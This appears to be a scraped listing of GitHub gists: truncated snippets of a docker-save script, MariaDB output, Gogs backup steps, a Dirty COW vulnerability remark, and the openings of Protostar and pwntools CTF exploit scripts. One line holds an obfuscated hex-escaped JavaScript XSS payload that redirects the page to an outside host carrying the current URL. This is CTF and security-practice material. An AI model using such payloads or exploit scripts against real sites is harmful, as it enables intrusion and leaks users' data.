Debian Linux Jessie 3.16.36-1+deb8u1
is vulnerable to Dirty COW (CVE-2016-5195).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
OUTPUT="images/linuxkit.tar" | |
IMG_REGEX="/^(linuxkit)/" | |
IMG_IDS=$(docker images | awk '{if ($1 ~ '${IMG_REGEX}') print $3}') | |
docker save ${IMG_IDS} -o ${OUTPUT} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<p>[][`\x66\x69\x6c\x74\x65\x72`][`\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72`]`\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x66\x72\x2f\x3f\x27\x2b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e``` |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
MariaDB [(none)]> SHOW DATABASES; | |
+--------------------+ | |
| Database | | |
+--------------------+ | |
| app | | |
| information_schema | | |
| mysql | | |
| performance_schema | | |
+--------------------+ | |
4 rows in set (0.00 sec) |
- Create a
backup
user on your Gogs server - Add this
backup
user as read-only collaborator to the projects that you want to backup - Generate a token for this user (here)
- Update configuration of the script (especially
BACKUP_DIRECTORY
,BACKUP_USERNAME
,BACKUP_TOKEN
,API_BASE_URL
andGIT_HOST
) - Run the script
- (Optionally) add this script to your
crontab
orrsnapshot.conf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
export TMP=$(mktemp -d) | |
/bin/cat <<-EOF >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 0 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64 | |
from pwn import * | |
context.log_level = 'info' | |
PROMPT = '>>> ' | |
def get_con(): | |
p = remote('ctf.bzh', 11000) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# Doc: docs.pwntools.com/en/stable/ | |
context.log_level = 'debug' # debug/info/error/warning. | |
context.arch = 'i386' # i386/x64/arm, etc. | |
## OPEN SOCKET. | |
sock = remote('challenges.ecsc-teamfrance.fr', 2000) | |
## OR, OPEN LOCAL PROCESS. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context.clear(arch='amd64', log_level='info') | |
PROMPT = b'peterpan@pwnuser:~$ ' | |
LOCAL = False | |
p = None | |
def create_process(): |